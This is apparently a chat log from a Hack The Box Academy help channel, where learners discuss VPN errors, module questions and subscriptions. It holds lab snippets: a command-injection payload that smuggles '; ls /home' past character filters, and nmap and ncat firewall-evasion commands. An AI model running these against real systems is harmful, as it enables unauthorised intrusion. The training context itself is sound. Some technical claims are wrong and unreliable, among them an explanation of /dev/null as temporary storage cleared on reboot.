2021-09-23 09:14:30 sitnl_send: rtnl: generic error (-101): Network is unreachable                                    │
2021-09-23 09:14:30 ROUTE6: default_gateway=UNDEF                                                                     │
2021-09-23 09:14:30 ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such device (errno=19)                            │
2021-09-23 09:14:30 Exiting due to fatal error       

this is what happens

i downloaded a new one too

still not working

actually the starting point vpn also doesnt work :C

the tryhackme vpn also doesnt work

ill use the pwnbox for now but if someone knows the problem please tell

Is your openvpn installed correctly?

i guess yeah i reinstalled it as well (im on arch btw)

i did sudo openvpn academy.ovpn which is giving this

then i sudo pacman -S openvpn

which reinstalled

still same errorr

every ovpn key is giving this

yeah i have network configuration manager

As you see the reason for the error is that there is no /dev/net/tut, so make sure you have the correct path to the .ovpn file

huh wdym

i did the same thing yesterday it was working just fine

2021-09-23 09:14:30 ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such device (errno=19)                            │
2021-09-23 09:14:30 Exiting due to fatal error 

yeah i see that

im in this directory

where i have academy.ovpn

now i do sudo openvpn academy.ovpn?

This should also need to work
sudo openvpn --config academy.ovpn

same error

It might not work but you could also use your network manager to connect to openvpn

For arch you also need networkmanager-openvpn installed

can someone help me on the assembly language module? i just have a question

Hi, sorry but after 4 hours of failures, I'm going to ask help again
Module: broken authentication - bruteforcing cookies
Question: Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag?

So I managed to decode and encode the cookie as role:admin and got a 'successfull' response. But not successfull enough, as it seems :/
I've tried a lot of combinations with user and role, but nothing seems to work.
I've also tried to bruteforce the 'time' param in the decoded cookie but nothing. Can somebody help me please?

I solved the second question and the 'super user' role is actually 'admin'.. so maybe there is an error in the module?

tried with admin and htbadmin aswell..

bruh

16 hours

for this ||nmap -p- 10.129.117.1 -oA target||

and this is the question

Perform a full TCP port scan on your target and create an HTML report. Submit the number of the highest port as the answer.

i suppose im executing with correct arguments

not sure I get your issue... DM ?

ok

@ionic bloom I can ask if there's a way how to enumerate it 🙂

you would need a wordlist of roles..

Awesome 🙂

an Hint like: You'll need to enumerate the roles would have been really usefull 😛

either fuzzing it or reading the question carefully 😄

i just deleted your wordlist to prevent spoilers 🙂

sorry

No worries. if you want to discuss more, please reach out to me

has any1 truly hacked wifi?

hey! hello to everyone

i'm stuck in the web application module

in this question

If you wanted to inject a malicious link to "www.malicious.com", and have the clickable text read 'Click Me', what's the HTML code you would use?

i've tried the <a> tags, the <button> tags, in every combination possible

obviously I'm not expecting the answer, I just need to speak with someone because I think something really simple is missing for me

thank you!

Has anyone found the solution for the module using web proxies, question about the 31 characters long?

I solved it already, thanksssss

Suggestion?

same for me too

i tried to connect my kali linux to the VPN

but it keeps giving me error

i would like some help with that

DM me pls

Rebooting fixed it for me

Hi, I´m trying to answer this question from the Learning Process course, does anybody knows the answer?

Subtract the numbers form eachother

XD, i thought it was a string type answer, thx!

Can anyone help me/give me a hint on which sub-domain i should go after
Its the Attacking Web Applications with Ffuf module

Hii guyz

I am new to cybersecurity

But i want tp learn it desperately

Can you guyz guide me where to start please?

++academy

read about http-statuscodes

Thats not my problem. problem is there are 3 different sub-domains and 3 different file extensions, meaning i have to run a lot of scans, but as we speak i just got it xD

Okay nice

but u learned about recursive scanning, right?

so technically u just need 3 scans

Yeah, 1 scan doing a normal directory scan running recursively and 3 more for the 3 different extensions

Has someone done Skill Assessment - Broken Authentication? I'm stuck at the end.. tried every possible role with every possible user I've enumerated.. but nothing

Hey, any1 there who could help me out with the last question on Active Directory LDAP

 What non-default privilege does the htb-student user have?

Not sure what i am looking for, at least not for userAcountControl or User's domain privileges ...

I haven’t figured this one out either

Dear @blissful verge may i ask you to shed some light what this question is about? Apparently it's not about userAcountControl or User's domain privileges... not sure where to look as nothing stands out 🤨

what do u mean rebooting it?

like redownloading the VPN package?

reboot ur computer

worked for me

ohhh

i closed my kali linux VM then reopened it

and redownloaded the package multiple times

on different days

still no work idk why

it worked one day that was the first time i did it then it's like nope

i no work anymore

😭

Academy - Cracking Passwords with Hashcat. Somebody have solved the first question?

arkadaslar aranizda CCNA hazirlasan ve ya CCNA kazanan varmi?

has anyonew completed INTRODUCTION TO PYTHON 3

yup, dm ?

yes, dm 🙂

i did

What was the answer to what is the 3rd most word on the exercise target window

I think i have to figure it out using the requests module

no the answer is inside the exercise

can someone DM me on how to connect to the HTB server and all that

Dumbar10 did you ever find out the answer and what module are you in?

💩 😶

anyone please give me an nudge in active directory powerview module skill assessment quetion

can anyone tell me what i am doing wrong

sudo tcpdump -Xr /tmp/capture.pcap

😆

Is anyone experiencing the same situation in the "Stack-Based Buffer Overflows on Windows x86" Module?
If you faced it DM me or see the module page again.

Network Enumeration with Nmap -> Host and Port Scanning -> Filtered Ports
I don't really get the purpose behind showing us the packet-trace for dropped and rejected packets.
Is it to show us how to differentiate filtered states ? The first scan is showing us how the packet trace looks like if we have 2 syn packets; the firewall is dropping the packets. The second one is a SYN and an ICMP (type=3/code=3) response. That strongly suggest the firewall is rejecting the packets. At the end you are saying we'll have to take a look at it later. Does that mean we can ignore filtered state if the packets are dropped but we should investigate further if the packets are rejected?

why is ZAP not installed by default in that parrot provided by HTB

Because

Why the modules are scattered like this?
Why you don't put them under their relative path?

The coming soon modules? They aren't released yet so not in their final state.

Hello everyone, I am trying to complete "Bypassing Other Blacklisted Characters" in the Command Injections module. But I am kinda stuck. I have tried many ways to run the command "ls /home" using envirnment variables but I can't seem to get the name of the user. Here are one of the commands I've tried:
127.0.0.1${LS_COLORS:10:1}${IFS}${LS_COLORS:14:1}${LS_COLORS:1:1}${IFS}${PATH:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}

This is supposed to be: 127.0.0.1; ls /home

I am not getting "invalid input" but a blank result.

The question for that module is:
Use what you learned in this section to find name of the user in the '/home' folder. What user did you find?

dude im so lost im doing the intro to network traffic analysis right now, which im pretty comfortable with

this one quesiton just wont go though

it's what protocol is used at the link layer of tcp

which is mac, that or arp

neither of which are an accepted answer

am i just being stupid or is the answer off

for anyone else with this issue, it's mac-address

just got it

ugh

dude, I love HTB Academy, but TBH sometimes the questions I feel like aren't worded correctly

oh absolutely

and like i was just doing

and then the answer has be written a specific way

the answer to this question was obviously fucking mac

but it had a dash and had to be mac-address, which was inconsistent with the other answers being things like "ipv4"

Also, going back to my original question, I also ran this command in burp and still no results:
127.0.0.1${LS_COLORS:10:1}${IFS}ls${IFS}${PATH:0:1}home

127.0.0.1; ls /home

couldn't help you on that one, your guess is the best i would be able to do too

thanks no worries

I noticed that sometimes if I don't get the answer, I'll just skip to a different section and come back later

I'm trying to complete all the modules for the Bug Bounty Hunter cert

nobody really answers this channel unfortunately

yeah that sucks

THM is super active

and any issues you have mostly have writeups about them

should i try that out as well

oh definitely

im trying to get a good toolkit pretty fast

yeah ok ill check it out

a lot of htb has writeups as well

the reason I'm on HTB Academy is coz I exhausted majority of the modules at THM lolol

I learned a ton already from there and currently planning to take the Comptia Pentest+ exam in a couple months

sometimes i hate htb because every time i feel smart for about thirty seconds it shames me with a new tool

I wanna say ALL of the platforms are good: HTB, THM, INE and Pentester Labs

I went through alot of the courses and they all offer different approaches to certain problems/exploits/attacks

do you have a favorite or no

@keen jay check DM

I don't think I have a favorite. They are all good TBH. I forgot to mention Udemy is good too. I'd say do all of them. The only one I didn't like was Cybrary, because they don't allow you to VPN into their machines and use your own tools.

Also Codecademy is good, so you can learn to read/write exploits.

read and write exploits has nothing to do with codecademy

sorry

it's a learning platform to learn how to code a particular language.

meant to clarify, codecademy teaches you to code

Yeah

ples add a cross site scripting module in Academy i needs it

https://twitter.com/hackthebox_eu/status/1441432755842306052

lucky you I guess

||libnsock mksock_bind_addr(): Bind to 0.0.0.0:53 failed (IOD #1): Address already in use|| getting this when doing network enumeration with nmap medium labs

||sudo ncat -nv --source-port 53 10.129.2.48 53|| command that im executign

there is no ncat in the pwnbox?

and when i do on my machine i get this

Why does the box in the Getting Started Knowledge Check keep disconnecting? Every other minute its getting unresponsive for some time, incredibly annoying!

ok so i got access to the ||proftpd server running on port 21 via ncat|| module is network enumeration with nmap firewall evasionmedium labs

now what?

nvm we have to run scripts

ikr its very unresponsive

so i reached the last lab in network enum with nmap

i tried both of these service versions they are not the correct answer that is the output of ||nmap -sV 10.129.158.74|| btw

i connected to both of the services using ||ncat -nv --source-port 53 ip 80/22||

in ssh i get broken pipe thing

and in http i get

oh

wait but there are only 2 running?

how do i get some info on filtered

hm

ok

ah ok

i do remember doing a -p- probably thought i did it cuz i started doing this one right after the medium lab

bruh

still nothing in full scan

and it is a hard lab question only

scanned on pwnbox too

same thing

doingh

says this

-p- -sA

ikr

thats why i remember doing a full scan and only seeing ssh and http

im gonna try regenerating target

omg ok

ugh

this one will take sometime

nvm

omg

i got

a port called

tcpwrapped

oh

dafuq

it timed out

||sudo ncat -nv --source-port 53 10.129.14.185 50000||

after doing this

didnt even say connection successful

sheesh

whats up with this module

can u connect to the academy vpn and scan sudo nmap 10.129.14.185 -p- -sS

do you get all the ports?

sure

ok now when i did -p50000 i got the running service name

but connecintG :C

nope

i just cross checked the ndcat command with the one in evasion section

its exactly the same except ip

still

it says address already in use

same happening in pwnbox

thank

Maybe try #general .. O.o

what's the issue !

Dm me

Anyone else having issues on ZAP Scanner section of Using Web Proxies? ZAP doesn't seem to find a High Alert

Hi, are there any Win32 assembly/reversing tracks?

brrruh

i've deleted and downloadewd the vpn multiple times

restarted my computer

but still

it doesnt connect

it was connecting yesterday

plis help

i even bought student sub

hey everyone! i'm working through the hashcat academy module and i'm super stuck on the "cracking common hashes" section, would very much appreciate a push!

My VPN isn't working either. It worked fine the last few day but nothing I do this morning is getting it to connect. I tried downloading it again and nothing. Are you also getting a "TLS Error"?

yep

2021-09-27 16:18:08 VERIFY KU OK
2021-09-27 16:18:08 Validating certificate extended key usage
2021-09-27 16:18:08 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2021-09-27 16:18:08 VERIFY EKU OK
2021-09-27 16:18:08 VERIFY OK: depth=0, C=UK, ST=City, L=London, O=HackTheBox, CN=htb, name=htb, emailAddress=info@hackthebox.eu``` tis happens and then after sometime the handshake fails and keeps looping

Same as me. Hmm... Maybe it's something on their end?

probably

I'm able to connect to my other HTB VPN just fine.

oh yeah didnt try that

i've no idea why, but every time this happened to me i deleted the key, downloaded it again from the site and it worked/// mb try that?

sheesh the other one is exiting for me

done 10-15 times

oh, sucks then=(

if you are still having problems with the vpn DM me

You on the skills assessment part yet? I need assistance on the third Question

my vpn isn't working either

Yeah, I'm still having issues with mine.

it sucks i was trying something in a win 10 vm (im in stack-based buffer overflow on windows x86) and i was just about to succeed and then i got kicked out of the vm

because of the vpn connection

im in Skills Assessment

almost done

You were connected and then got kicked off? That does suck...

yes it really does

So the silver annual subscription effectively locks you out of buying a cube subscription for a year, which you need to do any of the tier 3 and tier 4 modules. Currently you can either
a) Make a second account and get the Tier-3 and Tier-4 modules there at the reduced rate
b) Pay 40% more to buy cubes on the silver annual subscription.

Is this planned to change anytime soon?

Even if you get the platinum subscription and then want to buy more cubes you'd have to buy them at the original rate, since it's a monthly subscription, not a discount coupon.

I would recommend against buying modules with a different account, as you'd need all your module progress under one account when you want to use the exam voucher that comes with the annual subscription.

@mortal basin With the monthly subscription you can wait while you are busy with work/certificates and the module you are currently doing or save your cubes for a while.

The module progress for the exam is unaffected though, no? The account with the silver annual can do all of those modules already within the subscription.

Yes, but I would recommend having all of your progress under a single account, which is better for the long run.

If you check the note on the annual subscription you'll see that it saves hundreds of dollars, so in either case you'll be saving even if you buy other modules with cubes at the original rate.

Also, as it unlocks all tier 0/1/2 modules, and as we are releasing more modules frequently, you'll be getting more of you money's worth without having to pay anything extra, as all new modules from these tiers would be free "which are the majority of modules if you check the coming soon modules in the job role path".

hi all, could still very much use some help with the hashcat module if anyone's around!

@mortal basin I would prefer to have it all in one account as well. It's just unsatisfactory to be locked out of a saving opportunity either way. Thanks for understanding and responding to my input

Hey! I'm having trouble with the Skill assessment of Web fuzzing.

Not getting any results when fuzzing for subdomains. If i go to the site using browser i get an SSL error.
"Error code: SSL_ERROR_RX_RECORD_TOO_LONG". Is there a problem with the machines or might i just be stopid?

dm 🙂

dm 🙂

Woah! Did you all know about the "Intro to Binary Exploitation" path? Now you do https://academy.hackthebox.com/paths

just wondering, hashcat module mentions "wireless attacks module in HTB Academy" few times but i cant seem to find it, is it just me being blind or is it still in the works?

Please remember to follow the server rules and ask before DMing users.

Has anyone here worked on the Web Requests module? I’m in the POST section, but I have no idea what is supposed to go into the submission box. I think I have the exploit working but I don’t know if it is supposed to give away a flag. The section doesn’t prompt for a specific kind of answer

Indeed, I think that module is not available yet.

Hey, any1 there who could help me out with the last question on Active Directory LDAP
What non-default privilege does the htb-student user have?

Not sure what i am looking for, at least not for userAcountControl or User's domain privileges ...

same question here?!

The one where you gotta login as... and grab the flag?

Is anyone able to connect to the academy vpn? I haven't been able to connect since yesterday. I just keep getting TLS Errors. I've tried redownloading the .ovpn file several times and restarted the VM a few time. No luck.

same

sup peeps I freaking need HELP with the COMMAND INJECTIONS skill assessments, can't find the vulnerable parameters and that 'Advanced Search' thing idk why it doesn't work

wsp

I reached out to Hack The Box Support on the website and they gave me a new file to try and it worked! Maybe reach out to them and see if they can help you, too.

NVM I figured it out. It’s a lot more straightforward than I expected

Hey, I m stuck in the module Login Brute Forcing in the chapter Skills Assessment - service login I don't understand how to get the information about the employee for the first question

dm 🙂

cool thanks for the info

Hello everyone! Who I can dm about module Wordpress hacking? I stuck on question: "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.". Any hints please

COuld I ask someone about the Web Requets module the POST Method part in particular

Is it the one about logging in to get a flag?

yes

not sure what I'm supposed to input or if it's bugged or something

Feel free to DM me 😄

Otherwise I posted some hints for this one previously in this channel that you can search for

It's a little tricky

hey guys

for the getting started module

knowledge check part

Anyone?

I haven't done it myself but does wpscan help at all?

Actually no

May be I missed something. I have one theory. Will check it

Solved.. Damn it! So easy!

😅

is it theoretically possible for an ipv6 address to be ::?

:: in an ipv6 address would simply represent 16 zeros

so yes

its possible

lmfao, imagine that

"my ip address is ::"

even shorter than ipv4 😄

I mean you can have it as a part of an ipv6 address

but having just :: would make it only 64 bits

so it would be invalid

since you need 128 bits for an ipv6 address

anybody done knowledge check part in getting started module

ah that sucks, it'd be epic to be able to have an ip address that is literally just two colons

It would probably just be loopback like 0.0.0.0 is

Sorry not loopback - wrong word

https://en.m.wikipedia.org/wiki/0.0.0.0 yeah it's the same for IPv6

Hey! Having some trouble getting any signs of response from a target in the "Getting Started" module, I might have to ask for help, but first of all:
Does academy targets need to be accessed from the "My Workstation" instance or pwnBox? Cus I'm trying to do it from my own kali VM instead. Even tried connecting to HTB VPN without any change.

I thought the :: represents any number of zero blocks needed to fill the missing length of the address. In other words :: alone being equivalent to 128 0-bits

It is supposed to also work on a VM as well.

Yeah I got it working, but for some reason I got no response of the URL on any tools while connected to the htb VPN. Turned off the VPN and it started working. URL wasn't on the HTB vpn subnet so probably had no reason to VPN from the get-go, but not sure why I didn't get a response before I VPN'd.

Need help here! I'm on Network Enumeration with Nmap Hard Lab, and I found the hidden port 50000. But whenever I try to connect with netcat, it refuses, saying the address is already in use. I googled it and have no idea still. Can somebody help?

I've checked with netstat and not showing any PID to kill. (I'm trying to connect with 50000 using source port 53)

Hey citrus, I'm actually on the exact same issue for past hour...

good to know I'm not the only one stuck here lol

There is a yt video about it. I was stucked also there. you are on the right track. connect to 50000 and disable port 53

Thanks for the nudge!

got the flag 😄 bless ya sweetheart

super! 😄 Now I am stuck maybe we will me up at brute forcing haha

lol meet ya there after few hours

👍

What is this "Beta Tester Invite"

You can use your own kali too, but make sure you download the right vpn file. The default one for the lab doesn't work for Academy

my vpn is again not working

I have a question about the ffuf module

On the skill assessment part, I don't find the file with "You don't have access" content EDIT: Found it

Hello guys , i am new to hackthebox...
basically i have just completed a my course (module) of the Linux Fundamentals , i have 40 cubes.. i want a advice if someone can suggest me which module should i purchase next within 40 cubes , and as a new as well , i would appreciate if someone suggests.

Hi everyone! I am working on the basic toolset module of HTB academy and I had a question on the firewall evasion IDS/IPS easy lab. I tried running commands that use the -S or -D options
sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0
or
sudo nmap 10.129.2.28 -n -Pn -p 445 -O -D RND:5
and I either got the tcp/ip fingerprint or a message saying that there were No exact OS matches for host. Eventually I tried using ICMP echo requests -PE and got a ttl of 63 so I entered linux as my answer, yet it was incorrect. I am wondering if someone has found a way to do it using decoys or the -S command. I would really appreciate some help.

dm 🙂

I would go the normal "path" but it depends where you want to go - with your interests and so on

I went on the «Getting Started» module, which seems to me like it's a general tutorial on how one could go about attacking a box. Seems like the most essential module to me. But I'm a complete beginner to infosec.

Hi, I need a hint on Broken Authentication module, Page 12, Question 1. I know how to manipulate the cookie, but no matter what I try, the web app says that role does not have any flag. I've tried with: admin, administrator, htbadmin, superuser, super user, root. I've tried all these roles with users "htbuser" and "htbadmin", but no luck. Any ideas?

Yeah I did recently

I found a solution lemme see if I can find it again

thanks!!

I’m having some trouble completing the web requests module

When I spawn my workstation and try to follow the steps, the steps doesn’t match what I’m experiencing in the VM, foxyproxy doesn’t have a burp option, when I try to do it manually in burp all I get are some errors

Someone else experienced this?

use burpsuite

Ok guys, should I just give up on ZAP in the Using Web Proxies module? It says to use the High Alert to get the flag, but ZAP is not finding a High Alert no matter how many time I run it, or change settings ** Update ** It turns out my spawned target was not correct. Once I spawned a fresh target I got the vuln

I am taking the "USING WEB PROXIES" module and I want to use ZAP, but I can't find it in the pwnbox instance. Anyone knows why?

Hi quick question, I have an issue with XSS module phishing section, i managed to get the flag but when I injected XSS on the first page http://targetIP/phishing the imageURL stayed on the page (can't send screenshot sadly x) )
I used document.getElementById('urlform').remove(); as shown in the course but it kept staying on the page dunno if its section error or me that missed something?
here's the code of the element I tried removing

                <input type="text" placeholder="Image URL" name="url">
            </form>```

I am having the same issue, ZAP doesn't seem to be installed

also no "GET VPN Key" for cozy experience

Did you find any solution? i am facing the same issue

Okay, Thanks😃

same vpn problem

Because it is most likely not installed, so you will have to install it yourself.

I do recommend doing that on your own virtual machine though.

^

support said to install zap manually before they update pwnthingie

I already tried using burp suit and it doesn’t work

I can't on the website but on my VM I can ?

Hi, Has anyone completed the Broken Authentication module?

Someone can say to me because I don't know what is it and I can't see...

any help on TCPdump modules

Were absolute or relative sequence numbers used during the capture? (see question-1.zip to answer)

Sounds like a pretty straight forward question - what's up?

Yes dosnt work and niether No

Thats what i did understand

It looks like you have used up your pwnbox time for the day. You can get unlimited time by subscribing or purchasing cubes. Alternatively you can set up your own VM.

Is possible to access the targets with my own Kali?

Yes, using a VPN

"Alternatively you can set up your own VM." how ?

I have a kali linux personnaly.

That should be fine.

But how can I set up a VM for HTB ?

1. start kali 2) get the academy vpn key 3) openvpn keyname

Done but for example when I do : uname -a on a terminal, I had not parrot.

For the question HTN Academy.

How can I set up my kali with the HTB vpn?

I don't rememebr where to get the VPN file for the Academy - it should be on the platform somewhere (like in your settings or when you want to spawn a target)

but when you get it, just type sudo openvpn yourvpnfilehere.ovpn in a terminal

then you should be ready to roll

?

I see, it's bit confusing that not all the exercises are made to be used with your own VM

what's the exact name of the module and which section is it?

I used pwnbox in the HTB so to found the answer.

its "Intro to Network Traffic Analysis" the section is Tcpdump fundamental

Q number 2

the answer is in lowercase

Yeah I know but the answer was parrot and in my VM it is :

i tried yes and no and still nothing maybe im using wrong answer

that was for Mastermind 😄

Ah ok.

It's one of the two options, and lowercase

But look my screen.

all of that is a LOT of information

only a part of it is the answer

try figuring out what -a prints and what you need

Yeah but with me it was parrot on the VM in HTB Academy, and in Kali is so what ?

It is kali so no ?

For me it is that.

I think you have to remote to the target machine first

i dont know but keeps saying it wrong

ssh with student-blabla 😄

@oak summit can you DM me what you're tryign to type in?

Wdym ?

Don't you get a target machine?

I don't remember 100%

I finished the Introduction in Academy :).

ah, sorry I think I misunderstood what you meant then 😅

No but you see it :

When I was on the HTB's VM the answer was parrot and with my VM it what ?

yeah so uname -a tells you information about the OS and kernel of the machine

so if you run it on Kali it'll be different than running it on Parrot

Yeah so for me the answer would have been kali.

No ?

yeah I guess

hey peeps

Im stuck on the sqlmap assessment

I cant find an attack vector, can anyone help me out?

i wish the rest of the sqlmap course covered searching a website for attack vectors, I'm feeling very unprepared for the assessment

@valid oxide It does prepare you but you gotto look and test each field on the website. Comb through each page and input and maybe use a web proxy to ensure you are not missing anything and can see everything being sent in the data fields.

and header fields

Can any one help or just tell me what should I do to find the path to a user's mail?

From Linux Fundamentals Module, The shell section, interactive session

@drifting harness Do you love having a friendly environment around where you live?

env?

Got it thanks

Can anyone explain to me why /dev/null always remain empty? I mean how? What is the functionality?

Temporary files that are only needed during a program is running typically will be stored there and disappear when you reboot the system (or any other similar files). Because there is no need for such files to remain permanent on the system, they are put there. For example think of a log file for a program's functionality that does not benefit the regular/normal user very much, the log files will be generated and put in /dev/null and if you want you can have a look at them, however, they dont serve a big purpose to your use, thus they will be deleted on reboot. (This is as far as I understand, if I am wrong anyone correct me.)

Think of it as an auto-delete trash bin.

I understand this and thank you for elaboration but what you just said about deletion upon reboot doesn't seem to be right

Why

I just redirected this
find / -name "*.conf" 2>/dev/null

And then when I checked the /dev/null by cat, it was empty

Even tho I hadn't rebooted

Ooh I think I also forgot about that

https://linuxhint.com/what_is_dev_null/

never mind

its what you said

There may be some continuous flushing of data from /dev/null I think, for which a seperate process may be there

they will be deleted once written to there

Still the information you gave was helpful ! Thanks for the quick response

Ya , but how

What is the code?

We might need to call Linus here to ask what he did

Lol

No, no need. For the why/how part, check out this book "How Linux Works, 3rd Edition: What Every Superuser Should Know".

Where is this info hosted?

Its a book you can buy.